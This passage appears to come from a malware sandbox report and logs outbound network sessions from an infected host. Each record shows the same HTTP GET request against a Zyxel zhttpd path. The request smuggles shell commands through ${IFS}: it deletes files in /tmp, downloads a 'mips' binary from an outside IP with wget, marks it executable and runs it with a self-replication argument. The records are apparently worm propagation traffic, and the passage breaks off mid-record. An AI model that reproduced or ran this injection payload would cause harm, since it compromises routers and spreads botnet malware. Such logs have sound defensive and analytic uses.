                              Mar 31, 2024 08:41:46.088958979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6639192.168.2.135430639.69.54.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.088982105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6640192.168.2.1337462189.11.10.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.089034081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6641192.168.2.1346874191.95.236.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.089087009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6642192.168.2.134653853.74.197.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.089118004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6643192.168.2.133767860.97.78.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.089169025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6644192.168.2.1351872102.211.34.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.092672110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6645192.168.2.1339812143.104.65.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.092704058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6646192.168.2.1346666132.16.83.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.092736006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6647192.168.2.1332854159.251.31.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.092767954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6648192.168.2.1359366123.178.221.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.092842102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6649192.168.2.135931624.104.45.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.092864990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6650192.168.2.1335020112.142.102.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.092920065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6651192.168.2.135214424.65.213.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.092952013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6652192.168.2.136050098.214.83.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.092983007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6653192.168.2.1339298155.183.223.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098381996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6654192.168.2.133688896.204.51.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098408937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6655192.168.2.134713814.203.33.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098459005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6656192.168.2.135749477.240.173.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098476887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6657192.168.2.1360052108.214.176.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098532915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6658192.168.2.1353964176.120.169.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098584890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6659192.168.2.135749012.111.47.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098639965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6660192.168.2.1349164173.105.213.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098687887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6661192.168.2.1336720186.188.37.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098722935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6662192.168.2.1360788190.126.201.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098747015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6663192.168.2.1345912124.63.182.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098773003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6664192.168.2.1353482207.12.14.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098817110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6665192.168.2.133903875.232.29.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098845005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6666192.168.2.1348682176.75.80.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098891973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6667192.168.2.1337566102.206.246.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098927975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6668192.168.2.1347942130.29.193.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.098985910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6669192.168.2.135056684.126.203.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099016905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6670192.168.2.1344458160.77.200.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099071980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6671192.168.2.1354828117.83.172.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099103928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6672192.168.2.1345352100.195.157.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099158049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6673192.168.2.135948651.174.24.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099189997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6674192.168.2.1345522147.156.8.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099211931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6675192.168.2.1337474193.176.245.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099257946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6676192.168.2.1355716131.123.31.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099297047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6677192.168.2.13433521.127.213.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099323034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6678192.168.2.134523493.36.20.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099380016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6679192.168.2.1333012152.19.156.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:47.099411964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6680192.168.2.1356204222.217.59.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105021954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6681192.168.2.1359936194.37.51.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105053902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6682192.168.2.1353280106.56.109.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105104923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6683192.168.2.1360772151.222.116.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105158091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6684192.168.2.1356194122.45.237.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105195045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6685192.168.2.136002643.207.23.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105268955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6686192.168.2.133969864.231.118.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105293989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6687192.168.2.133498494.138.177.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105343103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6688192.168.2.1342034153.143.197.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105397940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6689192.168.2.1342638201.218.151.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105416059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6690192.168.2.1352294166.141.11.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105443001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6691192.168.2.1357074134.192.182.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105504036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6692192.168.2.134638072.18.123.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105570078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6693192.168.2.133897495.123.153.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105600119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6694192.168.2.135190431.26.43.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105663061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6695192.168.2.134804868.97.245.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105707884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6696192.168.2.1353942171.151.21.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105750084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6697192.168.2.1352340206.120.138.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105779886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6698192.168.2.134508635.228.57.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105809927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6699192.168.2.1355172170.197.227.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105890036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6700192.168.2.1337952143.199.111.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105926991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6701192.168.2.1339932159.172.220.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.105983973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6702192.168.2.134034417.112.53.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.106009960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6703192.168.2.13507849.42.51.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.106071949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6704192.168.2.1348690167.5.77.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.106098890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6705192.168.2.135084017.5.14.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.106163979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6706192.168.2.134764237.196.219.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:48.106203079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6707192.168.2.1335900126.76.10.139443
                              TimestampBytes transferredDirectionData
